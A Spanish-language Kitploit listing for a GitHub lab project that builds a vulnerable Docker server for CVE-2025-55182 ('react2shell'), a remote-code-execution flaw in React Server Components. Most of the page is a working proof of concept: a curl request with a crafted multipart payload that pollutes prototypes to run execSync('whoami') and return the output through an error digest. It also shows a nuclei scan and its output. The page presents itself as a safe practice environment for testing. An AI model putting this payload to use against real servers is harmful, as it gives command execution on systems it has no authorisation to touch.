Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Test-Server — ¡Juega con react2shell en un entorno seguro! | Kitploit
Herramientas/GitHubGitHub/doobthegoober/cve-2025-55182-test-server
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubdoobthegoober/cve-2025-55182-test-server

CVE-2025-55182-Test-Server

¡Juega con react2shell en un entorno seguro!

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

CVE-2025-55182-Test-Server

¡Juega con react2shell en un entorno seguro!

Inicio rápido

Clona el repositorio

root@kitploit:~
git clone https://github.com/CharlesTheGreat77/CVE-2025-55182-Test-Server
cd CVE-2025-55182-Test-Server

Ejecuta el archivo docker

root@kitploit:~
docker compose up --build -d

PoC

root@kitploit:~
curl -s -X POST http://localhost:3000/adfa \
  -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" \
  -H "Accept-Language: en-US,en;q=0.5" \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----NextRceMitsecOps" \
  --data-binary $'------NextRceMitsecOps\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'whoami\').toString(\'base64\');throw Object.assign(new Error(\'x\'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------NextRceMitsecOps\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------NextRceMitsecOps\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------NextRceMitsecOps--\r\n' | grep -o '"digest"[[:space:]]*:[[:space:]]*"[^"]*"' | sed 's/.*"digest":[[:space:]]*"//' | sed 's/"$//' | base64 -d && echo

Nuclei

Agregué una plantilla de nuclei para comprobar de forma segura CVE-2025-55182

root@kitploit:~
nuclei -u http://localhost:3000 -t react-rsc-rce.yaml

[INF] Current nuclei version: v3.6.0 (latest)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://localhost:3000/
[INF] Scan completed in 42.390709ms. 1 matches found.

Pendientes

Extensión de Burpsuite para escanear pasivamente la vulnerabilidad mientras se añaden comandos personalizados para ejecutar.

Descargar herramienta